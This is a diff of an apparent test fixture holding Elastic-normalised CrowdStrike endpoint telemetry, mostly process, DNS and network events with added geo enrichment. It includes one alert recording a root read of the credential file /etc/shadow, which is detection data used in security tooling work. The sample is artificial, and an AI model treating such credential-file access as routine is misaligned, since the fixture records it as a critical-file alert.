@@ -5649,8 +6393,11 @@ "67.43.156.14" ] }, + "os": { + "type": "macos" + }, "event": { - "ingested": "2021-12-09T13:36:11.151048300Z", + "ingested": "2021-12-14T14:41:26.533780556Z", "original": "{\"event_simpleName\":\"FirmwareAnalysisStatus\",\"ConfigStateHash\":\"3090255842\",\"FirmwareAnalysisEclControlInterfaceVersion\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"FirmwareAnalysisEclConsumerInterfaceVersion\":\"0\",\"BootTimeFunctionalityLevel\":\"255\",\"ReasonOfFunctionalityLevel\":\"3\",\"CurrentFunctionalityLevel\":\"2\",\"Entitlements\":\"15\",\"name\":\"FirmwareAnalysisStatusMacV2\",\"id\":\"ffffffff-1111-11eb-ba57-0214a0d89bf7\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff0d7b4d839912e55b4755e85b\",\"timestamp\":\"1625677368429\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"PciAttachmentState\":\"65535\"}", "created": "2021-07-07T17:02:48.429Z", "kind": "state", @@ -5685,28 +6432,27 @@ ] }, { - "os": { - "type": "macos" - }, - "source": { - "address": "67.43.156.14", - "ip": "67.43.156.14" - }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], "observer": { - "serial_number": "ffffffff557f4b99a0afdea9ce8cd6fa", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0013701.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff557f4b99a0afdea9ce8cd6fa", + "type": "agent", + "version": "1007.4.0013701.1" }, "@timestamp": "2021-07-07T17:05:04.544Z", + "os": { + "type": "macos" + }, "ecs": { "version": "1.12.0" }, 
@@ -5723,8 +6469,24 @@ "67.43.156.14" ] }, + "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.14", + "ip": "67.43.156.14" + }, "event": { - "ingested": "2021-12-09T13:36:11.151054800Z", + "ingested": "2021-12-14T14:41:26.533780943Z", "original": "{\"OutOctets\":\"0\",\"CreationTimeStamp\":\"\",\"aip\":\"67.43.156.13\",\"OutMulticastPkts\":\"0\",\"InErrors\":\"0\",\"InterfaceAlias\":\"utun2\",\"InDiscards\":\"0\",\"InterfaceIndex\":\"17\",\"event_platform\":\"Mac\",\"InterfaceType\":\"1\",\"id\":\"ffffffff-1111-11eb-a272-0294ad12fbe7\",\"PhysicalAddressLength\":\"0\",\"InUcastPkts\":\"0\",\"EffectiveTransmissionClass\":\"2\",\"timestamp\":\"1625677504544\",\"LocalAddressIP4\":\"67.43.156.14\",\"event_simpleName\":\"LocalIpAddressIP4\",\"ConfigStateHash\":\"3090255842\",\"PhysicalAddress\":\"\",\"OutErrors\":\"0\",\"InUnknownProtos\":\"0\",\"OutUcastPkts\":\"0\",\"InMulticastPkts\":\"0\",\"ConfigBuild\":\"1007.4.0013701.1\",\"InOctets\":\"0\",\"NetLuidIndex\":\"2\",\"Entitlements\":\"15\",\"name\":\"LocalIpAddressIP4MacV1\",\"aid\":\"ffffffff557f4b99a0afdea9ce8cd6fa\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:05:04.544Z", "kind": "state", @@ -5760,7 +6522,13 @@ "InUcastPkts": "0", "EffectiveTransmissionClass": "2", "cid": "ffffffff15754bcfb5f9152ec7ac90ac" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { 
@@ -5795,12 +6563,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff70d140ca9ba97f0dddd14137", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.8.0009806.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff70d140ca9ba97f0dddd14137", + "type": "agent", + "version": "1007.8.0009806.1" }, "@timestamp": "2020-11-08T17:04:59.681Z", "ecs": { @@ -5820,7 +6597,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151061100Z", + "ingested": "2021-12-14T14:41:26.533781370Z", "original": "{\"CommandLine\":\"uname -a\",\"ConfigBuild\":\"1007.8.0009806.1\",\"ConfigStateHash\":\"4288861242\",\"Entitlements\":\"15\",\"GID\":\"0\",\"ImageFileName\":\"/bin/uname\",\"MD5HashData\":\"894356eb59e279696c304f07091b7fde\",\"NDRoot\":\"321385814512398584\",\"ParentProcessId\":\"321385814512398584\",\"ProcessEndTime\":\"1604855099.126\",\"ProcessGroupId\":\"0\",\"ProcessStartTime\":\"1604855099.126\",\"RGID\":\"0\",\"RUID\":\"0\",\"RawProcessId\":\"51342\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"de80fe0bd06a96543aaec5c634b08cbfc58dba88ea3a66871434a0dd3a9e9dfa\",\"SVGID\":\"0\",\"SVUID\":\"0\",\"SessionProcessId\":\"314116638974342642\",\"SourceProcessId\":\"321385814512398584\",\"SourceThreadId\":\"0\",\"TargetProcessId\":\"321385814512398605\",\"UID\":\"0\",\"aid\":\"ffffffff70d140ca9ba97f0dddd14137\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Lin\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-ac87-06decddc17a1\",\"name\":\"ProcessRollup2LinV5\",\"timestamp\":\"1604855099681\"}", "created": "2020-11-08T17:04:59.681Z", "kind": "event", 
@@ -5856,6 +6633,23 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffff75fc48f15cfe5f095e605c4c", + "type": "agent", + "version": "1007.4.0011104.1" + }, "process": { "pid": 28987, "thread": { @@ -5866,24 +6660,10 @@ "sha256": "6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0" } }, + "@timestamp": "2020-11-08T17:04:56.730Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff75fc48f15cfe5f095e605c4c", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0011104.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2020-11-08T17:04:56.730Z", "ecs": { "version": "1.12.0" }, 
@@ -5900,7 +6680,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151067300Z", + "ingested": "2021-12-14T14:41:26.533781775Z", "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0011104.1\",\"ConfigStateHash\":\"1789338890\",\"ContextProcessId\":\"317713210176499254\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855096.730\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"28987\",\"SHA256HashData\":\"6de76ab470a16b2a825d223b996d994623473c694c60fccbb71af8691e61c5e0\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"317713210176499254\",\"aid\":\"ffffffff75fc48f15cfe5f095e605c4c\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-809e-02fff4e55a49\",\"name\":\"EndOfProcessMacV14\",\"timestamp\":\"1604855099646\"}", "created": "2020-11-08T17:04:59.646Z", "kind": "event", @@ -5934,7 +6714,13 @@ "NetworkCloseCount": 0, "SuspectStackCount": 0, "cid": "ffffffff30a3407dae27d0503611022d" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { 
@@ -5962,12 +6748,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffffb5db4b2e7ec89aba537adcc2", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffffb5db4b2e7ec89aba537adcc2", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:04:57.926Z", "ecs": { 
@@ -5986,7 +6781,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151073500Z", + "ingested": "2021-12-14T14:41:26.533782168Z", "original": "{\"AllocateVirtualMemoryCount\":\"0\",\"ArchiveFileWrittenCount\":\"0\",\"AsepWrittenCount\":\"0\",\"BinaryExecutableWrittenCount\":\"0\",\"CLICreationCount\":\"0\",\"ConHostId\":\"38188\",\"ConHostProcessId\":\"3099352216141\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3343111420\",\"ContextData\":\"\",\"ContextProcessId\":\"3100508103359\",\"ContextThreadId\":\"93436292950223\",\"ContextTimeStamp\":\"1604855097.926\",\"CreateProcessCount\":\"0\",\"CycleTime\":\"2937514388\",\"DirectoryCreatedCount\":\"0\",\"DirectoryEnumeratedCount\":\"1\",\"DnsRequestCount\":\"0\",\"DocumentFileWrittenCount\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ExeAndServiceCount\":\"0\",\"ExecutableDeletedCount\":\"0\",\"ExitCode\":\"0\",\"FileDeletedCount\":\"2\",\"GenericFileWrittenCount\":\"0\",\"ImageSubsystem\":\"3\",\"InjectedDllCount\":\"0\",\"InjectedThreadCount\":\"0\",\"KernelTime\":\"7500000\",\"MaxThreadCount\":\"4\",\"ModuleLoadCount\":\"38\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkConnectCountUdp\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkModuleLoadCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"ParentProcessId\":\"3099350649383\",\"PrivilegedProcessHandleCount\":\"0\",\"ProcessStartTime\":\"1604855096.463\",\"ProtectVirtualMemoryCount\":\"0\",\"QueueApcCount\":\"0\",\"RawProcessId\":\"33016\",\"RegKeySecurityDecreasedCount\":\"0\",\"RemovableDiskFileWrittenCount\":\"0\",\"RunDllInvocationCount\":\"0\",\"SHA256HashData\":\"faceb6f5d1cdc5ad50a4a1b92c4cd3fcdabcf7e8d418014a1b1221c1defa3d8f\",\"ScreenshotsTakenCount\":\"0\",\"ScriptEngineInvocationCount\":\"0\",\"ServiceEventCount\":\"0\",\"SetThreadContextCount\":\"0\",\"SnapshotFileOpenCount\":\"0\",\"SuspectSt
ackCount\":\"0\",\"SuspiciousCredentialModuleLoadCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"SuspiciousFontLoadCount\":\"0\",\"SuspiciousRawDiskReadCount\":\"0\",\"TargetProcessId\":\"3100508103359\",\"UnsignedModuleLoadCount\":\"0\",\"UserMemoryAllocateExecutableCount\":\"0\",\"UserMemoryAllocateExecutableRemoteCount\":\"0\",\"UserMemoryProtectExecutableCount\":\"0\",\"UserMemoryProtectExecutableRemoteCount\":\"0\",\"UserSid\":\"S-1-5-18\",\"UserTime\":\"6406250\",\"aid\":\"ffffffffb5db4b2e7ec89aba537adcc2\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-8726-063418e4a9e7\",\"name\":\"EndOfProcessV15\",\"timestamp\":\"1604855099935\"}", "created": "2020-11-08T17:04:59.935Z", "kind": "event", @@ -6067,6 +6862,23 @@ } }, { + "observer": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "address": "67.43.156.14", + "vendor": "crowdstrike", + "ip": "67.43.156.14", + "serial_number": "ffffffff1aa0482a5ea94f64e08e7b15", + "type": "agent", + "version": "1007.4.0009304.1" + }, "process": { "pid": 10507, "thread": { @@ -6077,24 +6889,10 @@ "sha256": "3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3" } }, + "@timestamp": "2020-11-08T17:05:01.341Z", "os": { "type": "macos" }, - "url": { - "scheme": "http" - }, - "tags": [ - "preserve_original_event" - ], - "observer": { - "serial_number": "ffffffff1aa0482a5ea94f64e08e7b15", - "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0009304.1", - "vendor": "crowdstrike", - "ip": "67.43.156.14" - }, - "@timestamp": "2020-11-08T17:05:01.341Z", "ecs": { "version": "1.12.0" }, 
@@ -6111,7 +6909,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151079900Z", + "ingested": "2021-12-14T14:41:26.533782555Z", "original": "{\"AsepWrittenCount\":\"0\",\"ConfigBuild\":\"1007.4.0009304.1\",\"ConfigStateHash\":\"3344040805\",\"ContextProcessId\":\"311775981885093125\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855101.341\",\"DirectoryCreatedCount\":\"0\",\"DnsRequestCount\":\"0\",\"Entitlements\":\"15\",\"ExecutableDeletedCount\":\"0\",\"FileDeletedCount\":\"0\",\"NetworkBindCount\":\"0\",\"NetworkCapableAsepWriteCount\":\"0\",\"NetworkCloseCount\":\"0\",\"NetworkConnectCount\":\"0\",\"NetworkListenCount\":\"0\",\"NetworkRecvAcceptCount\":\"0\",\"NewExecutableWrittenCount\":\"0\",\"RawProcessId\":\"10507\",\"SHA256HashData\":\"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3\",\"SuspectStackCount\":\"0\",\"SuspiciousDnsRequestCount\":\"0\",\"TargetProcessId\":\"311775981885093125\",\"aid\":\"ffffffff1aa0482a5ea94f64e08e7b15\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"EndOfProcess\",\"id\":\"ffffffff-1111-11eb-bc03-065126dd0691\",\"name\":\"EndOfProcessMacV12\",\"timestamp\":\"1604855100139\"}", "created": "2020-11-08T17:05:00.139Z", "kind": "event", @@ -6145,7 +6943,13 @@ "NetworkCloseCount": 0, "SuspectStackCount": 0, "cid": "ffffffff30a3407dae27d0503611022d" - } + }, + "url": { + "scheme": "http" + }, + "tags": [ + "preserve_original_event" + ] }, { "process": { 
@@ -6178,12 +6982,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff3a5a424fa02450da53619745", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff3a5a424fa02450da53619745", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:00.030Z", "ecs": { 
@@ -6203,7 +7016,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151086200Z", + "ingested": "2021-12-14T14:41:26.533782996Z", "original": "{\"AuthenticationId\":\"999\",\"CommandLine\":\"D:\\\\projects\\\\splunk-forwarder\\\\bin\\\\splunk-powershell.exe --ps2\",\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3765958535\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"ImageFileName\":\"\\\\Device\\\\HarddiskVolume2\\\\projects\\\\splunk-forwarder\\\\bin\\\\splunk-powershell.exe\",\"ImageSubsystem\":\"3\",\"IntegrityLevel\":\"16384\",\"MD5HashData\":\"571391f723a439e985a2064337e2802a\",\"ParentAuthenticationId\":\"999\",\"ParentBaseFileName\":\"splunkd.exe\",\"ParentProcessId\":\"17346335177\",\"ProcessCreateFlags\":\"67634688\",\"ProcessEndTime\":\"\",\"ProcessParameterFlags\":\"24577\",\"ProcessStartTime\":\"1604855099.406\",\"ProcessSxsFlags\":\"64\",\"RawProcessId\":\"6116\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"7f326aad0ee45bfef93daede5597d70422d472084ae3295762654fb5021a8720\",\"SessionId\":\"0\",\"SourceProcessId\":\"17346335177\",\"SourceThreadId\":\"107650023406\",\"Tags\":\"27, 151, 12094627905582, 12094627906234\",\"TargetProcessId\":\"583707537390\",\"TokenType\":\"1\",\"UserSid\":\"S-1-5-18\",\"WindowFlags\":\"384\",\"aid\":\"ffffffff3a5a424fa02450da53619745\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-a09e-06f79d630255\",\"name\":\"ProcessRollup2V17\",\"timestamp\":\"1604855100030\"}", "created": "2020-11-08T17:05:00.030Z", "kind": "event", 
@@ -6269,12 +7082,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff4f1444bab96568879cb43556", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff4f1444bab96568879cb43556", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:04:55.961Z", "ecs": { @@ -6292,7 +7114,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151092400Z", + "ingested": "2021-12-14T14:41:26.533783428Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"2784638081\",\"ContextProcessId\":\"259090530891\",\"ContextThreadId\":\"16409623709004\",\"ContextTimeStamp\":\"1604855095.961\",\"DnsRequestCount\":\"1\",\"DomainName\":\"comp1.dom2\",\"DualRequest\":\"0\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"InterfaceIndex\":\"0\",\"RequestType\":\"1\",\"aid\":\"ffffffff4f1444bab96568879cb43556\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"DnsRequest\",\"id\":\"ffffffff-1111-11eb-8077-0606f7dcf2ed\",\"name\":\"DnsRequestV3\",\"timestamp\":\"1604855099913\"}", "created": "2020-11-08T17:04:59.913Z", "kind": "event", 
@@ -6334,12 +7156,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff32ba43a483e76c6f0a4aa26f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.8.0009806.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff32ba43a483e76c6f0a4aa26f", + "type": "agent", + "version": "1007.8.0009806.1" }, "@timestamp": "2020-11-08T17:05:01.645Z", "file": { @@ -6363,7 +7194,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151098800Z", + "ingested": "2021-12-14T14:41:26.533783807Z", "original": "{\"ConfigBuild\":\"1007.8.0009806.1\",\"ConfigStateHash\":\"4288861242\",\"ContextProcessId\":\"321385820045701199\",\"ContextThreadId\":\"0\",\"ContextTimeStamp\":\"1604855101.645\",\"Entitlements\":\"15\",\"GID\":\"0\",\"TargetFileName\":\"/etc/shadow\",\"UID\":\"0\",\"UnixMode\":\"32768\",\"aid\":\"ffffffff32ba43a483e76c6f0a4aa26f\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Lin\",\"event_simpleName\":\"CriticalFileAccessed\",\"id\":\"ffffffff-1111-11eb-b70d-027f9ced2001\",\"name\":\"CriticalFileAccessedLinV1\",\"timestamp\":\"1604855102247\"}", "created": "2020-11-08T17:05:02.247Z", "kind": "alert", @@ -6425,12 +7256,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff1aa0482a5ea94f64e08e7b15", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", - "type": "agent", - "version": "1007.4.0009304.1", "vendor": "crowdstrike", - "ip": "67.43.156.14" + "ip": "67.43.156.14", + "serial_number": "ffffffff1aa0482a5ea94f64e08e7b15", + "type": "agent", + "version": "1007.4.0009304.1" }, "@timestamp": "2020-11-08T17:05:09.180Z", "ecs": { 
@@ -6450,7 +7290,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151105100Z", + "ingested": "2021-12-14T14:41:26.533784256Z", "original": "{\"CommandLine\":\"/usr/bin/plutil -convert xml1 -o - /Applications/Xcode.app/Contents/Developer/Platforms/AppleTVOS.platform/Developer/Library/CoreSimulator/Profiles/Runtimes/tvOS.simruntime/Contents/Resources/RuntimeRoot/System/Library/PrivateFrameworks/DiagnosticExtensions.framework/PlugIns/com.apple.DiagnosticExtensions.CrashLogs.appex/Info.plist\",\"ConfigBuild\":\"1007.4.0009304.1\",\"ConfigStateHash\":\"3344040805\",\"Entitlements\":\"15\",\"GID\":\"0\",\"ImageFileName\":\"/usr/bin/plutil\",\"MD5HashData\":\"d51cef1b288e2032aee9805deff04bfd\",\"MachOSubType\":\"1\",\"ParentProcessId\":\"311774817965726568\",\"ProcessEndTime\":\"\",\"ProcessGroupId\":\"311774817965726568\",\"ProcessStartTime\":\"1604855111.240\",\"RGID\":\"0\",\"RUID\":\"0\",\"RawProcessId\":\"10692\",\"SHA1HashData\":\"0000000000000000000000000000000000000000\",\"SHA256HashData\":\"3b00897e1eb587c5f77e3866ff6bdc80f5e70f839543242e0ee5a1581014adc3\",\"SVGID\":\"0\",\"SVUID\":\"0\",\"SourceProcessId\":\"311776004953765502\",\"SourceThreadId\":\"0\",\"Tags\":\"27, 12094627905582, 12094627906234\",\"TargetProcessId\":\"311776004953765502\",\"UID\":\"0\",\"aid\":\"ffffffff1aa0482a5ea94f64e08e7b15\",\"aip\":\"67.43.156.14\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"ProcessRollup2\",\"id\":\"ffffffff-1111-11eb-bc03-065126dd0691\",\"name\":\"ProcessRollup2MacV3\",\"timestamp\":\"1604855109180\"}", "created": "2020-11-08T17:05:09.180Z", "kind": "event", 
@@ -6506,12 +7346,21 @@ "preserve_original_event" ], "observer": { - "serial_number": "ffffffff8f1e4b77b4dae5debaa1c8bc", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffff8f1e4b77b4dae5debaa1c8bc", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:14.133Z", "file": { @@ -6537,7 +7386,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151111400Z", + "ingested": "2021-12-14T14:41:26.533784704Z", "original": "{\"ConfigBuild\":\"1007.3.0011603.1\",\"ConfigStateHash\":\"3899738370\",\"ContextProcessId\":\"1546527409909\",\"ContextThreadId\":\"4711690090889\",\"ContextTimeStamp\":\"1604855114.133\",\"DesiredAccess\":\"1180054\",\"EffectiveTransmissionClass\":\"3\",\"Entitlements\":\"15\",\"FileAttributes\":\"0\",\"FileIdentifier\":\"501ee2c32e53fb43b07f419f3236fb45c29e000000002c00\",\"FileObject\":\"18446655033844205120\",\"Information\":\"2\",\"IrpFlags\":\"2180\",\"MajorFunction\":\"0\",\"MinorFunction\":\"0\",\"OperationFlags\":\"0\",\"Options\":\"88080484\",\"ShareAccess\":\"1\",\"Status\":\"0\",\"TargetFileName\":\"\\\\Device\\\\HarddiskVolume4\\\\Windows\\\\Temp\\\\__PSScriptPolicyTest_dvkjnbka.apn.ps1\",\"aid\":\"ffffffff8f1e4b77b4dae5debaa1c8bc\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Win\",\"event_simpleName\":\"NewScriptWritten\",\"id\":\"ffffffff-1111-11eb-80b5-06e11a66e03d\",\"name\":\"NewScriptWrittenV7\",\"timestamp\":\"1604855114427\"}", "created": "2020-11-08T17:05:14.427Z", "kind": "event", 
@@ -6578,8 +7427,20 @@ "type": "macos" }, "destination": { - "port": 443, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 443, "ip": "67.43.156.14" }, "source": { @@ -6599,12 +7460,21 @@ "direction": "inbound" }, "observer": { - "serial_number": "ffffffffd4094240a6b1d12aaf304f4f", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.4.0012205.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "ffffffffd4094240a6b1d12aaf304f4f", + "type": "agent", + "version": "1007.4.0012205.1" }, "@timestamp": "2020-11-08T17:05:16.421Z", "ecs": { @@ -6626,7 +7496,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:36:11.151117800Z", + "ingested": "2021-12-14T14:41:26.533785092Z", "original": "{\"ConfigBuild\":\"1007.4.0012205.1\",\"ConfigStateHash\":\"1306766522\",\"ConnectionDirection\":\"1\",\"ConnectionFlags\":\"0\",\"ContextProcessId\":\"321275232072440993\",\"ContextTimeStamp\":\"1604855116.421\",\"Entitlements\":\"15\",\"InContext\":\"0\",\"LocalAddressIP4\":\"0.0.0.0\",\"LocalPort\":\"0\",\"Protocol\":\"6\",\"RemoteAddressIP4\":\"67.43.156.14\",\"RemotePort\":\"443\",\"aid\":\"ffffffffd4094240a6b1d12aaf304f4f\",\"aip\":\"67.43.156.13\",\"cid\":\"ffffffff30a3407dae27d0503611022d\",\"event_platform\":\"Mac\",\"event_simpleName\":\"NetworkConnectIP4\",\"id\":\"ffffffff-1111-11eb-aca9-02683aed2a0d\",\"name\":\"NetworkConnectIP4MacV5\",\"timestamp\":\"1604855116502\"}", "created": "2020-11-08T17:05:16.502Z", "kind": "event", 
@@ -6658,13 +7528,37 @@ "type": "windows" }, "destination": { - "port": 443, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 443, "ip": "67.43.156.14" }, "source": { - "port": 53961, + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "address": "67.43.156.14", + "port": 53961, "ip": "67.43.156.14" }, "url": { @@ -6680,12 +7574,21 @@ "direction": "outbound" }, "observer": { - "serial_number": "fffffffff000426eb99afaa2ccdcbc17", + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", - "type": "agent", - "version": "1007.3.0011603.1", "vendor": "crowdstrike", - "ip": "67.43.156.13" + "ip": "67.43.156.13", + "serial_number": "fffffffff000426eb99afaa2ccdcbc17", + "type": "agent", + "version": "1007.3.0011603.1" }, "@timestamp": "2020-11-08T17:05:16.849Z", "ecs": { 
